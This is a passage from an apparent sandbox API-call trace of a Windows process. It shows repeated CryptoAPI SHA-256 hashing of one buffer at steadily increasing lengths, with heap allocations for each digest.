	[0191.144] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0191.144] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264068
	[0191.144] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264068, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264068, pdwDataLen=0x1283b0) returned 1
	[0191.144] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.144] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.144] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.144] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.144] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0191.144] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264090
	[0191.144] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264090, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264090, pdwDataLen=0x1283b0) returned 1
	[0191.144] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.144] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.144] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.145] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.145] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0191.145] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2640b8
	[0191.145] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2640b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2640b8, pdwDataLen=0x1283b0) returned 1
	[0191.145] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.145] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.145] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.145] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.146] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0191.146] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2640e0
	[0191.146] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2640e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2640e0, pdwDataLen=0x1283b0) returned 1
	[0191.146] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.146] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.146] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.146] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.146] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0191.146] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264108
	[0191.146] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264108, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264108, pdwDataLen=0x1283b0) returned 1
	[0191.146] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.146] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.146] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.147] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.147] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0191.147] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264130
	[0191.147] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264130, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264130, pdwDataLen=0x1283b0) returned 1
	[0191.147] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.147] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.147] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.147] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.147] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0191.147] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.229] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264158
	[0191.229] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264158, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264158, pdwDataLen=0x1283b0) returned 1
	[0191.229] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.229] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.229] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.229] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.229] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0191.230] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264180
	[0191.230] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264180, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264180, pdwDataLen=0x1283b0) returned 1
	[0191.230] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.230] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.230] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.230] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.230] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0191.230] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.230] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2641a8
	[0191.230] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2641a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2641a8, pdwDataLen=0x1283b0) returned 1
	[0191.230] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.230] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.230] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.231] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.231] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0191.231] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.231] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2641d0
	[0191.231] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2641d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2641d0, pdwDataLen=0x1283b0) returned 1
	[0191.231] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.231] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.231] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.232] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.232] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0191.232] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.232] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2641f8
	[0191.232] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2641f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2641f8, pdwDataLen=0x1283b0) returned 1
	[0191.232] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.232] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.232] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.233] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.233] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0191.233] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.233] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264220
	[0191.233] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264220, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264220, pdwDataLen=0x1283b0) returned 1
	[0191.233] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.233] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.233] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.233] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.233] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0191.233] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.233] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264248
	[0191.234] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264248, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264248, pdwDataLen=0x1283b0) returned 1
	[0191.234] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.234] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.234] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.234] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.234] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0191.234] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.234] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264270
	[0191.234] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264270, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264270, pdwDataLen=0x1283b0) returned 1
	[0191.234] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.234] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.234] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.235] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.235] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0191.235] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.235] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264298
	[0191.235] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264298, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264298, pdwDataLen=0x1283b0) returned 1
	[0191.235] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.235] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.235] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.236] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.236] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0191.236] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.236] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2642c0
	[0191.236] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2642c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2642c0, pdwDataLen=0x1283b0) returned 1
	[0191.236] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.236] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.236] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.236] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.236] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0191.237] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2642e8
	[0191.237] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2642e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2642e8, pdwDataLen=0x1283b0) returned 1
	[0191.237] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.237] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.237] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.237] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.237] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0191.237] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264310
	[0191.237] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264310, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264310, pdwDataLen=0x1283b0) returned 1
	[0191.237] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.237] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.237] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.238] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.238] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0191.238] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.238] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264338
	[0191.238] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264338, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264338, pdwDataLen=0x1283b0) returned 1
	[0191.238] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.238] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.238] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.239] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.239] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0191.239] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.239] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264360
	[0191.239] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264360, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264360, pdwDataLen=0x1283b0) returned 1
	[0191.239] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.239] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.239] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.240] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.240] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0191.240] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.240] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264388
	[0191.240] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264388, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264388, pdwDataLen=0x1283b0) returned 1
	[0191.240] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.240] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.240] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.240] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.240] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0191.240] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2643b0
	[0191.241] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2643b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2643b0, pdwDataLen=0x1283b0) returned 1
	[0191.241] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.241] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.241] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.241] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.241] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0191.241] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2643d8
	[0191.241] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2643d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2643d8, pdwDataLen=0x1283b0) returned 1
	[0191.242] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.242] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.242] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.242] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.242] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0191.242] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.242] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264400
	[0191.242] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264400, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264400, pdwDataLen=0x1283b0) returned 1
	[0191.242] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.242] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.242] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.243] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.243] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0191.243] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.243] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264428
	[0191.243] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264428, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264428, pdwDataLen=0x1283b0) returned 1
	[0191.243] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.243] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.243] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.244] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.244] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0191.244] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.244] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264450
